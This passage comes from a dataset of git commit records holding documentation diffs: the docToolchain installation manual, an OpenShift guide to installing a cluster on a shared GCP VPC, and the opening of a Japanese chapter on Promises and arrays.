Config.groovy file is then preconfigured to use the downloaded template.\n\nIMPORTANT: there is currently https:\/\/github.com\/docToolchain\/docToolchain\/issues\/259[a bug] in the setup \/ configuration if you use this approach to install docToolchain. To workaround it, go to <docToolchain home> and set the `inputPath` property in `gradle.properties` to `.`. Alternativly, use the approach described in our https:\/\/docs-as-co.de\/getstarted\/tutorial2[tutorial].\n\nTIP: Blog-Post: https:\/\/rdmueller.github.io\/arc42\/[Let's add Content!]\n\n== Build\n\nThis should already be enough to start a first build.\n\nBy now, docToolchain should be installed as command line tool and the path to its `bin` folder should be on your path.\nIf you now switch to your freshly initialized <newDocDir>, you should be able to execute the following commands:\n\n.Linux\n[source, bash]\n----\ndoctoolchain <docDir> generateHTML\ndoctoolchain <docDir> generatePDF\n----\n\n.Windows\n[source]\n----\ndoctoolchain.bat <docDir> generateHTML\ndoctoolchain.bat <docDir> generatePDF\n----\n\n<docDir> may be relative, e.g. \".\", or absolute.\n\nAs a result, you will see the progress of your build together with some warnings which you can just ignore for the moment.\n\nThe first build generated some files within the `<docDir>\/build`:\n\n[source]\n----\nbuild\n|-- html5\n| |-- arc42-template.html\n| `-- images\n| |-- 05_building_blocks-EN.png\n| |-- 08-Crosscutting-Concepts-Structure-EN.png\n| `-- arc42-logo.png\n`-- pdf\n |-- arc42-template.pdf\n `-- images\n |-- 05_building_blocks-EN.png\n |-- 08-Crosscutting-Concepts-Structure-EN.png\n `-- arc42-logo.png\n----\n\n*Congratulations!* if you see the same folder structure, you just managed to render the standard arc42 template as html and pdf!\n\nIf you didn't get the right output, please raise an issue on https:\/\/github.com\/docToolchain\/docToolchain\/issues[github]\n\nTIP: Blog-Posts: https:\/\/rdmueller.github.io\/enterprise-edition\/[Behind the great Firewall], https:\/\/rdmueller.github.io\/enterprise-edition2\/[Enterprise AsciiDoctor]\n\n== Publish to Confluence\n\nIn addition to `Config.groovy` there is also a `scripts\/ConfluenceConfig.groovy` file. If you are not using Confluence\nyou can remove it. If you use Confluence, then you need to open this file and adapt to your environment.\nYou can also create multiple copies of that file. For example you can have `ConfluenceConfig.groovy` for publishing\nofficial pages, and `MyConfluenceConfig.groovy` with a different Confluence space for reviews.\n\nThe paths to those configuration files can be provided by giving -P option to doctoolchain, for example:\n\n[source, bash]\n----\n# Uses scripts\/ConfluenceConfig.groovy by default\ndoctoolchain <docDir> publishToConfluence --no-daemon -q\n\n# Uses scripts\/MyConfluenceConfig.groovy\ndoctoolchain <docDir> publishToConfluence -PconfluenceConfigFile=scripts\/MyConfluenceConfig.groovy --no-daemon -q\n----\n","old_contents":":filename: manual\/02_install.adoc\n\n= How to install docToolchain\n\ninclude::feedback.adoc[]\n\n== Get the tool\n\nTo start with docToolchain you need to get a copy of the current docToolchain repository.\nThe easiest way is to clone the repository without history and remove the `.git` folder:\n\n.Linux with git clone\n[source,bash]\n----\ngit clone --recursive https:\/\/github.com\/docToolchain\/docToolchain.git <docToolchain home>\nrm -rf .git\nrm -rf resources\/asciidoctor-reveal.js\/.git\nrm -rf resources\/reveal.js\/.git\n----\n\n`--recursive` option is required because the repository contains 2 submodules - `resources\/asciidoctor-reveal.js` and `resources\/reveal.js`.\n\nAnother way is to download the zipped git repository and rename it:\n\n.Linux with download as zip\n[source, bash]\n----\nwget https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip\nunzip master.zip\n\n# fetching dependencies\n\ncd docToolchain-master\/resources\n\nrm -d reveal.js\nwget https:\/\/github.com\/hakimel\/reveal.js\/archive\/tags\/3.3.0.zip -O reveal.js.zip\nunzip reveal.js.zip\nmv reveal.js-tags-3.3.0 reveal.js\n\nrm -d asciidoctor-reveal.js\nwget https:\/\/github.com\/asciidoctor\/asciidoctor-reveal.js\/archive\/9667f5c.zip -O asciidoctor-reveal.js.zip\nunzip asciidoctor-reveal.js.zip\nmv asciidoctor-reveal.js-9667f5c5d926b3be48361d6d6413d3896954894c asciidoctor-reveal.js\n\nmv docToolchain-master <docToolchain home>\n----\n\n\nIf you work (like me) on a Windows environment, just download and unzip the https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip[repository] as well as its dependencies:\nhttps:\/\/github.com\/hakimel\/reveal.js\/archive\/tags\/3.3.0.zip[reveal.js] and\nhttps:\/\/github.com\/asciidoctor\/asciidoctor-reveal.js\/archive\/9667f5c.zip[asciidoctor-reveal.js].\n\nAfter unzipping, put the dependencies in `resources` folder, so that the structure is the same as on https:\/\/github.com\/docToolchain\/docToolchain\/tree\/master\/resources[GitHub].\n\n\/\/[source]\n\/\/----\n\/\/(New-Object\u00a0Net.WebClient).DownloadFile('https:\/\/github.com\/docToolchain\/docToolchain\/archive\/master.zip','master.zip')\n\/\/----\n\nYou can add <docToolchain home>\/bin to your PATH or you can run doctoolchain with full path if you prefer.\n\n== Initialize directory for documents\n\nThe next step after getting docToolchain is to initialize a directory where your documents live. In docToolchain this\ndirectory is named \"newDocDir\" during initialization, or just \"docDir\" later on.\n\n=== Existing documents\n\nIf you already have some existing documents in AsciiDoc format in your project, you need to put the configuration\nfile there to inform docToolchain what and how to process. You can do that manually by copying the contents of\ntemplate_config directory. You can also do that by running `initExisting` task.\n\n.Linux initExisting example\n[source, bash]\n----\ncd <docToolchain home>\n.\/gradlew -b init.gradle initExisting -PnewDocDir=<your directory>\n----\n\nYou need to open Config.groovy file and configure names of your files properly.\nYou may also change the PDF schema file to your taste.\n\n=== arc42 from scratch\n\nIf you don't have existing documents yet, or if you need a fresh start, you can get the https:\/\/arc42.org[arc42] template in AsciiDoc\nformat. You can do that by manually downloading from https:\/\/arc42.org\/download. You can also to that by running\n`initArc42<language>` task. Currently supported languages are:\n\n- DE - German\n- EN - English\n- ES - Spanish\n- RU - Russian\n\n.Linux initArc42EN example\n[source, bash]\n----\ncd <docToolchain home>\n.\/gradlew -b init.gradle initArc42EN -PnewDocDir=<newDocDir>\n----\n\nThe Config.groovy file is then preconfigured to use the downloaded template.\n\nIMPORTANT: there is currently https:\/\/github.com\/docToolchain\/docToolchain\/issues\/259[a bug] in the setup \/ configuration if you use this approach to install docToolchain. To workaround it, go to <docToolchain home> and set the `inputPath` property in `gradle.properties` to `.`. Alternativly, use the approach described in our https:\/\/docs-as-co.de\/getstarted\/tutorial2[tutorial].\n\nTIP: Blog-Post: https:\/\/rdmueller.github.io\/arc42\/[Let's add Content!]\n\n== Build\n\nThis should already be enough to start a first build.\n\nBy now, docToolchain should be installed as command line tool and the path to its `bin` folder should be on your path.\nIf you now switch to your freshly initialized <newDocDir>, you should be able to execute the following commands:\n\n.Linux\n[source, bash]\n----\ndoctoolchain <docDir> generateHTML\ndoctoolchain <docDir> generatePDF\n----\n\n.Windows\n[source]\n----\ndoctoolchain.bat <docDir> generateHTML\ndoctoolchain.bat <docDir> generatePDF\n----\n\n<docDir> may be relative, e.g. \".\", or absolute.\n\nAs a result, you will see the progress of your build together with some warnings which you can just ignore for the moment.\n\nThe first build generated some files within the `<docDir>\/build`:\n\n[source]\n----\nbuild\n|-- html5\n| |-- arc42-template.html\n| `-- images\n| |-- 05_building_blocks-EN.png\n| |-- 08-Crosscutting-Concepts-Structure-EN.png\n| `-- arc42-logo.png\n`-- pdf\n |-- arc42-template.pdf\n `-- images\n |-- 05_building_blocks-EN.png\n |-- 08-Crosscutting-Concepts-Structure-EN.png\n `-- arc42-logo.png\n----\n\n*Congratulations!* if you see the same folder structure, you just managed to render the standard arc42 template as html and pdf!\n\nIf you didn't get the right output, please raise an issue on https:\/\/github.com\/docToolchain\/docToolchain\/issues[github]\n\nTIP: Blog-Posts: https:\/\/rdmueller.github.io\/enterprise-edition\/[Behind the great Firewall], https:\/\/rdmueller.github.io\/enterprise-edition2\/[Enterprise AsciiDoctor]\n\n== Publish to Confluence\n\nIn addition to `Config.groovy` there is also a `scripts\/ConfluenceConfig.groovy` file. If you are not using Confluence\nyou can remove it. If you use Confluence, then you need to open this file and adapt to your environment.\nYou can also create multiple copies of that file. For example you can have `ConfluenceConfig.groovy` for publishing\nofficial pages, and `MyConfluenceConfig.groovy` with a different Confluence space for reviews.\n\nThe paths to those configuration files can be provided by giving -P option to doctoolchain, for example:\n\n[source, bash]\n----\n# Uses scripts\/ConfluenceConfig.groovy by default\nbin\/doctoolchain <docDir> publishToConfluence --no-daemon -q\n\n# Uses scripts\/MyConfluenceConfig.groovy\nbin\/doctoolchain <docDir> publishToConfluence -PconfluenceConfigFile=scripts\/MyConfluenceConfig.groovy --no-daemon -q\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ddeb47c90d7e9c9384ce1e434daeac90b2238845","subject":"BZ-1857151: Added a paragraph about shared VPC with link","message":"BZ-1857151: Added a paragraph about shared VPC with link\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"installing\/installing_gcp\/installing-gcp-user-infra-vpc.adoc","new_file":"installing\/installing_gcp\/installing-gcp-user-infra-vpc.adoc","new_contents":"[id=\"installing-gcp-user-infra-vpc\"]\n= Installing a cluster with shared VPC on user-provisioned infrastructure in GCP by using Deployment Manager templates\ninclude::modules\/common-attributes.adoc[]\n:context: installing-gcp-user-infra-vpc\n\ntoc::[]\n\nIn {product-title} version {product-version}, you can install a cluster into a shared Virtual Private Cloud (VPC) on Google Cloud Platform (GCP) that uses infrastructure that you provide. In this context, a cluster installed into a shared VPC is a cluster that is configured to use a VPC from a project different from where the cluster is being deployed.\n\nA shared VPC enables an organization to connect resources from multiple projects to a common VPC network. You can communicate within the organization securely and efficiently by using internal IPs from that network. For more information about shared VPC, see link:https:\/\/cloud.google.com\/vpc\/docs\/shared-vpc[Shared VPC overview] in the GCP documentation.\n\nThe steps for performing a user-provided infrastructure installation into a shared VPC are outlined here. Several\nlink:https:\/\/cloud.google.com\/deployment-manager\/docs[Deployment Manager] templates are provided to assist in\ncompleting these steps or to help model your own. You are also free to create\nthe required resources through other methods.\n\n[IMPORTANT]\n====\nThe steps for performing a user-provisioned infrastructure installation are provided as an example only. Installing a cluster with infrastructure you provide requires knowledge of the cloud provider and the installation process of {product-title}. Several Deployment Manager templates are provided to assist in completing these steps or to help model your own. You are also free to create the required resources through other methods; the templates are just an example.\n====\n\n== Prerequisites\n\n* Review details about the\nxref:..\/..\/architecture\/architecture-installation.adoc#architecture-installation[{product-title} installation and update]\nprocesses.\n* If you use a firewall and plan to use telemetry, you must\nxref:..\/..\/installing\/install_config\/configuring-firewall.adoc#configuring-firewall[configure the firewall to allow the sites] that your cluster requires access to.\n* If you do not allow the system to manage identity and access management (IAM),\nthen a cluster administrator can\nxref:..\/..\/installing\/installing_gcp\/manually-creating-iam-gcp.adoc#manually-creating-iam-gcp[manually\ncreate and maintain IAM credentials]. Manual mode can also be used in\nenvironments where the cloud IAM APIs are not reachable.\n+\n[NOTE]\n====\nBe sure to also review this site list if you are configuring a proxy.\n====\n\n[id=\"csr-management-gcp-vpc\"]\n== Certificate signing requests management\n\nBecause your cluster has limited access to automatic machine management when you\nuse infrastructure that you provision, you must provide a mechanism for approving\ncluster certificate signing requests (CSRs) after installation. The\n`kube-controller-manager` only approves the kubelet client CSRs. The\n`machine-approver` cannot guarantee the validity of a serving certificate\nthat is requested by using kubelet credentials because it cannot confirm that\nthe correct machine issued the request. You must determine and implement a\nmethod of verifying the validity of the kubelet serving certificate requests\nand approving them.\n\n[id=\"installation-gcp-user-infra-config-project-vpc\"]\n== Configuring the GCP project that hosts your cluster\n\nBefore you can install {product-title}, you must configure a Google Cloud\nPlatform (GCP) project to host it.\n\ninclude::modules\/installation-gcp-project.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-enabling-api-services.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-limits.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-service-account.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-permissions.adoc[leveloffset=+3]\ninclude::modules\/installation-gcp-regions.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-install-cli.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-config-host-project-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-gcp-dns.adoc[leveloffset=+2]\ninclude::modules\/installation-creating-gcp-vpc.adoc[leveloffset=+2]\ninclude::modules\/installation-deployment-manager-vpc.adoc[leveloffset=+3]\n\ninclude::modules\/installation-user-infra-generate.adoc[leveloffset=+1]\n\ninclude::modules\/installation-initializing-manual.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-shared-vpc-config-yaml.adoc[leveloffset=+2]\n\ninclude::modules\/installation-configure-proxy.adoc[leveloffset=+2]\n\n\/\/include::modules\/installation-three-node-cluster.adoc[leveloffset=+2]\n\ninclude::modules\/installation-user-infra-generate-k8s-manifest-ignition.adoc[leveloffset=+2]\n.Additional resources\n\n[id=\"installation-gcp-user-infra-exporting-common-variables-vpc\"]\n== Exporting common variables\n\ninclude::modules\/installation-extracting-infraid.adoc[leveloffset=+2]\ninclude::modules\/installation-user-infra-exporting-common-variables.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-lb.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-ext-lb.adoc[leveloffset=+2]\ninclude::modules\/installation-deployment-manager-int-lb.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-private-dns.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-private-dns.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-firewall-rules-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-firewall-rules.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-iam-shared-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-iam-shared-vpc.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-rhcos.adoc[leveloffset=+1]\n\ninclude::modules\/installation-creating-gcp-bootstrap.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-bootstrap.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-control-plane.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-control-plane.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-wait-for-bootstrap.adoc[leveloffset=+1]\n\ninclude::modules\/installation-creating-gcp-worker.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-worker.adoc[leveloffset=+2]\n\ninclude::modules\/cli-installing-cli.adoc[leveloffset=+1]\n\ninclude::modules\/cli-logging-in-kubeadmin.adoc[leveloffset=+1]\n\ninclude::modules\/installation-approve-csrs.adoc[leveloffset=+1]\n\ninclude::modules\/installation-gcp-user-infra-adding-ingress.adoc[leveloffset=+1]\n\n[id=\"installation-gcp-user-infra-vpc-adding-firewall-rules\"]\n== Adding ingress firewall rules\nThe cluster requires several firewall rules. If you do not use a shared VPC, these rules are created by the ingress controller via the GCP cloud provider. When you use a shared VPC, you can either create cluster-wide firewall rules for all services now or create each rule based on events, when the cluster requests access. By creating each rule when the cluster requests access, you know exactly which firewall rules are required. By creating cluster-wide firewall rules, you can apply the same rule set across multiple clusters.\n\nIf you choose to create each rule based on events, you must create firewall rules after you provision the cluster and during the life of the cluster when the console notifies you that rules are missing. Events that are similar to the following event are displayed, and you must add the firewall rules that are required:\n\n[source,terminal]\n----\n$ oc get events -n openshift-ingress --field-selector=\"reason=LoadBalancerManualChange\"\n----\n\n.Example output\n[source,terminal]\n----\nFirewall change required by security admin: `gcloud compute firewall-rules create k8s-fw-a26e631036a3f46cba28f8df67266d55 --network example-network --description \"{\\\"kubernetes.io\/service-name\\\":\\\"openshift-ingress\/router-default\\\", \\\"kubernetes.io\/service-ip\\\":\\\"35.237.236.234\\\"}\\\" --allow tcp:443,tcp:80 --source-ranges 0.0.0.0\/0 --target-tags exampl-fqzq7-master,exampl-fqzq7-worker --project example-project`\n----\n\nIf you encounter issues when creating these rule-based events, you can configure the cluster-wide firewall rules while your cluster is running.\n\ninclude::modules\/installation-creating-gcp-shared-vpc-cluster-wide-firewall-rules.adoc[leveloffset=+2]\n\n\/\/include::modules\/installation-creating-gcp-shared-vpc-ingress-firewall-rules.adoc[leveloffset=+1]\n\ninclude::modules\/installation-gcp-user-infra-completing.adoc[leveloffset=+1]\n\n== Next steps\n\n* xref:..\/..\/post_installation_configuration\/cluster-tasks.adoc#available_cluster_customizations[Customize your cluster].\n* If necessary, you can\nxref:..\/..\/support\/remote_health_monitoring\/opting-out-of-remote-health-reporting.adoc#opting-out-remote-health-reporting_opting-out-remote-health-reporting[opt out of remote health reporting].\n","old_contents":"[id=\"installing-gcp-user-infra-vpc\"]\n= Installing a cluster with shared VPC on user-provisioned infrastructure in GCP by using Deployment Manager templates\ninclude::modules\/common-attributes.adoc[]\n:context: installing-gcp-user-infra-vpc\n\ntoc::[]\n\nIn {product-title} version {product-version}, you can install a cluster into a shared Virtual Private Cloud (VPC) on Google Cloud Platform (GCP) that uses infrastructure that you provide. In this context, a cluster installed into a shared VPC is a cluster that is configured to use a VPC from a project different from where the cluster is being deployed. For more information, see Google's documentation on link:https:\/\/cloud.google.com\/vpc\/docs\/shared-vpc#shared_vpc_networks[shared VPC networks].\n\nThe steps for performing a user-provided infrastructure installation into a shared VPC are outlined here. Several\nlink:https:\/\/cloud.google.com\/deployment-manager\/docs[Deployment Manager] templates are provided to assist in\ncompleting these steps or to help model your own. You are also free to create\nthe required resources through other methods.\n\n[IMPORTANT]\n====\nThe steps for performing a user-provisioned infrastructure installation are provided as an example only. Installing a cluster with infrastructure you provide requires knowledge of the cloud provider and the installation process of {product-title}. Several Deployment Manager templates are provided to assist in completing these steps or to help model your own. You are also free to create the required resources through other methods; the templates are just an example.\n====\n\n== Prerequisites\n\n* Review details about the\nxref:..\/..\/architecture\/architecture-installation.adoc#architecture-installation[{product-title} installation and update]\nprocesses.\n* If you use a firewall and plan to use telemetry, you must\nxref:..\/..\/installing\/install_config\/configuring-firewall.adoc#configuring-firewall[configure the firewall to allow the sites] that your cluster requires access to.\n* If you do not allow the system to manage identity and access management (IAM),\nthen a cluster administrator can\nxref:..\/..\/installing\/installing_gcp\/manually-creating-iam-gcp.adoc#manually-creating-iam-gcp[manually\ncreate and maintain IAM credentials]. Manual mode can also be used in\nenvironments where the cloud IAM APIs are not reachable.\n+\n[NOTE]\n====\nBe sure to also review this site list if you are configuring a proxy.\n====\n\n[id=\"csr-management-gcp-vpc\"]\n== Certificate signing requests management\n\nBecause your cluster has limited access to automatic machine management when you\nuse infrastructure that you provision, you must provide a mechanism for approving\ncluster certificate signing requests (CSRs) after installation. The\n`kube-controller-manager` only approves the kubelet client CSRs. The\n`machine-approver` cannot guarantee the validity of a serving certificate\nthat is requested by using kubelet credentials because it cannot confirm that\nthe correct machine issued the request. You must determine and implement a\nmethod of verifying the validity of the kubelet serving certificate requests\nand approving them.\n\n[id=\"installation-gcp-user-infra-config-project-vpc\"]\n== Configuring the GCP project that hosts your cluster\n\nBefore you can install {product-title}, you must configure a Google Cloud\nPlatform (GCP) project to host it.\n\ninclude::modules\/installation-gcp-project.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-enabling-api-services.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-limits.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-service-account.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-permissions.adoc[leveloffset=+3]\ninclude::modules\/installation-gcp-regions.adoc[leveloffset=+2]\ninclude::modules\/installation-gcp-install-cli.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-config-host-project-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-gcp-dns.adoc[leveloffset=+2]\ninclude::modules\/installation-creating-gcp-vpc.adoc[leveloffset=+2]\ninclude::modules\/installation-deployment-manager-vpc.adoc[leveloffset=+3]\n\ninclude::modules\/installation-user-infra-generate.adoc[leveloffset=+1]\n\ninclude::modules\/installation-initializing-manual.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-shared-vpc-config-yaml.adoc[leveloffset=+2]\n\ninclude::modules\/installation-configure-proxy.adoc[leveloffset=+2]\n\n\/\/include::modules\/installation-three-node-cluster.adoc[leveloffset=+2]\n\ninclude::modules\/installation-user-infra-generate-k8s-manifest-ignition.adoc[leveloffset=+2]\n.Additional resources\n\n[id=\"installation-gcp-user-infra-exporting-common-variables-vpc\"]\n== Exporting common variables\n\ninclude::modules\/installation-extracting-infraid.adoc[leveloffset=+2]\ninclude::modules\/installation-user-infra-exporting-common-variables.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-lb.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-ext-lb.adoc[leveloffset=+2]\ninclude::modules\/installation-deployment-manager-int-lb.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-private-dns.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-private-dns.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-firewall-rules-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-firewall-rules.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-iam-shared-vpc.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-iam-shared-vpc.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-rhcos.adoc[leveloffset=+1]\n\ninclude::modules\/installation-creating-gcp-bootstrap.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-bootstrap.adoc[leveloffset=+2]\n\ninclude::modules\/installation-creating-gcp-control-plane.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-control-plane.adoc[leveloffset=+2]\n\ninclude::modules\/installation-gcp-user-infra-wait-for-bootstrap.adoc[leveloffset=+1]\n\ninclude::modules\/installation-creating-gcp-worker.adoc[leveloffset=+1]\ninclude::modules\/installation-deployment-manager-worker.adoc[leveloffset=+2]\n\ninclude::modules\/cli-installing-cli.adoc[leveloffset=+1]\n\ninclude::modules\/cli-logging-in-kubeadmin.adoc[leveloffset=+1]\n\ninclude::modules\/installation-approve-csrs.adoc[leveloffset=+1]\n\ninclude::modules\/installation-gcp-user-infra-adding-ingress.adoc[leveloffset=+1]\n\n[id=\"installation-gcp-user-infra-vpc-adding-firewall-rules\"]\n== Adding ingress firewall rules\nThe cluster requires several firewall rules. If you do not use a shared VPC, these rules are created by the ingress controller via the GCP cloud provider. When you use a shared VPC, you can either create cluster-wide firewall rules for all services now or create each rule based on events, when the cluster requests access. By creating each rule when the cluster requests access, you know exactly which firewall rules are required. By creating cluster-wide firewall rules, you can apply the same rule set across multiple clusters.\n\nIf you choose to create each rule based on events, you must create firewall rules after you provision the cluster and during the life of the cluster when the console notifies you that rules are missing. Events that are similar to the following event are displayed, and you must add the firewall rules that are required:\n\n[source,terminal]\n----\n$ oc get events -n openshift-ingress --field-selector=\"reason=LoadBalancerManualChange\"\n----\n\n.Example output\n[source,terminal]\n----\nFirewall change required by security admin: `gcloud compute firewall-rules create k8s-fw-a26e631036a3f46cba28f8df67266d55 --network example-network --description \"{\\\"kubernetes.io\/service-name\\\":\\\"openshift-ingress\/router-default\\\", \\\"kubernetes.io\/service-ip\\\":\\\"35.237.236.234\\\"}\\\" --allow tcp:443,tcp:80 --source-ranges 0.0.0.0\/0 --target-tags exampl-fqzq7-master,exampl-fqzq7-worker --project example-project`\n----\n\nIf you encounter issues when creating these rule-based events, you can configure the cluster-wide firewall rules while your cluster is running.\n\ninclude::modules\/installation-creating-gcp-shared-vpc-cluster-wide-firewall-rules.adoc[leveloffset=+2]\n\n\/\/include::modules\/installation-creating-gcp-shared-vpc-ingress-firewall-rules.adoc[leveloffset=+1]\n\ninclude::modules\/installation-gcp-user-infra-completing.adoc[leveloffset=+1]\n\n== Next steps\n\n* xref:..\/..\/post_installation_configuration\/cluster-tasks.adoc#available_cluster_customizations[Customize your cluster].\n* If necessary, you can\nxref:..\/..\/support\/remote_health_monitoring\/opting-out-of-remote-health-reporting.adoc#opting-out-remote-health-reporting_opting-out-remote-health-reporting[opt out of remote health reporting].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a6d3af29e3081f0bb21c8ed0232d73633f68d781","subject":"chore(promise-and-array): \u6587\u7ae0\u306e\u7e4b\u304c\u308a\u304c\u60aa\u304f\u306a\u3063\u305f\u306e\u3092\u4fee\u6b63","message":"chore(promise-and-array): \u6587\u7ae0\u306e\u7e4b\u304c\u308a\u304c\u60aa\u304f\u306a\u3063\u305f\u306e\u3092\u4fee\u6b63\n","repos":"purepennons\/promises-book,liyunsheng\/promises-book,cqricky\/promises-book,azu\/promises-book,liyunsheng\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,charlenopires\/promises-book,mzbac\/promises-book,oToUC\/promises-book,genie88\/promises-book,purepennons\/promises-book,wenber\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,azu\/promises-book,dieface\/promises-book,genie88\/promises-book,charlenopires\/promises-book,wenber\/promises-book,liubin\/promises-book,charlenopires\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,cqricky\/promises-book,azu\/promises-book,wenber\/promises-book,xifeiwu\/promises-book,sunfurong\/promise,lidasong2014\/promises-book,liubin\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,mzbac\/promises-book,wangwei1237\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,oToUC\/promises-book,mzbac\/promises-book,oToUC\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,sunfurong\/promise,tangjinzhou\/promises-book,sunfurong\/promise","old_file":"Ch2_HowToWrite\/promise-and-array.adoc","new_file":"Ch2_HowToWrite\/promise-and-array.adoc","new_contents":"[[ch2-promise-and-array]]\n== Promise\u3068\u914d\u5217\n\n\u3053\u3053\u307e\u3067\u3067\u3001promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c FulFilled \u307e\u305f\u306f Rejected \u3068\u306a\u3063\u305f\u6642\u306e\u51e6\u7406\u306f <<promise.then,`.then`>> \u3068 <<promise.catch,`.catch`>> \u3067\u767b\u9332\u51fa\u6765\u308b\u4e8b\u3092\u5b66\u3073\u307e\u3057\u305f\u3002\n\n\u4e00\u3064\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306a\u3089\u3001\u305d\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306b\u5bfe\u3057\u3066\u51e6\u7406\u3092\u66f8\u3051\u3070\u826f\u3044\u3067\u3059\u304c\u3001\n\u8907\u6570\u306epromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u304c\u5168\u3066FulFilled\u3068\u306a\u3063\u305f\u6642\u306e\u51e6\u7406\u3092\u66f8\u304f\u5834\u5408\u306f\u3069\u3046\u3059\u308c\u3070\u3088\u3044\u3067\u3057\u3087\u3046\u304b?\n\n\u4f8b\u3048\u3070\u3001A->B->C \u3068\u3044\u3046\u611f\u3058\u3067\u8907\u6570\u306eXHR(\u975e\u540c\u671f\u51e6\u7406)\u3092\u884c\u3063\u305f\u5f8c\u306b\u3001\u4f55\u304b\u3092\u3057\u305f\u3044\u3068\u3044\u3046\u4e8b\u4f8b\u3092\u8003\u3048\u3066\u307f\u307e\u3059\u3002\n\n\u3061\u3087\u3063\u3068\u30a4\u30e1\u30fc\u30b8\u3057\u306b\u304f\u3044\u306e\u3067\u3001\n\u307e\u305a\u306f\u3001\u901a\u5e38\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3092\u4f7f\u3063\u3066\u8907\u6570\u306eXHR\u3092\u884c\u3046\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30b3\u30fc\u30c9\u3092\u898b\u3066\u307f\u307e\u3059\u3002\n\n=== \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u3067\u8907\u6570\u306e\u975e\u540c\u671f\u51e6\u7406\n\n[source,js]\n[[multiple-xhr-callback.js]]\n.multiple-xhr-callback.js\n----\ninclude::embed\/embed-multiple-xhr-callback.js[]\n----\n\n\u4e0a\u8a18\u306e\u30b3\u30fc\u30c9\u3092\u5b9f\u969b\u306b\u5b9f\u884c\u3057\u3066\u3001XHR\u3067\u53d6\u5f97\u3057\u305f\u7d50\u679c\u3092\u5f97\u308b\u306b\u306f\u6b21\u306e\u3088\u3046\u306b\u306a\u308b\u3068\u601d\u3044\u307e\u3059\u3002\n\n[source,js]\n----\nmain(function(error, results){\n console.log(results);\n});\n----\n\n\u3053\u306e\u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u30b9\u30bf\u30a4\u30eb\u3067\u306f\u5e7e\u3064\u304b\u306e\u8981\u7d20\u304c\u51fa\u3066\u304d\u307e\u3059\u3002\n\n* `JSON.parse` \u3092\u305d\u306e\u307e\u307e\u4f7f\u3046\u3068\u4f8b\u5916\u3068\u306a\u308b\u30b1\u30fc\u30b9\u304c\u3042\u308b\u305f\u3081\u30e9\u30c3\u30d7\u3057\u305f`jsonParse`\u95a2\u6570\u3092\u4f7f\u3046\n* \u8907\u6570\u306eXHR\u3092\u305d\u306e\u307e\u307e\u66f8\u304f\u3068\u30cd\u30b9\u30c8\u304c\u6df1\u304f\u306a\u308b\u305f\u3081\u3001`allRequest`\u3068\u3044\u3046request\u95a2\u6570\u3092\u5b9f\u884c\u3059\u308b\u3082\u306e\u3092\u5229\u7528\u3059\u308b\n* \u30b3\u30fc\u30eb\u30d0\u30c3\u30af\u95a2\u6570\u306b\u306f 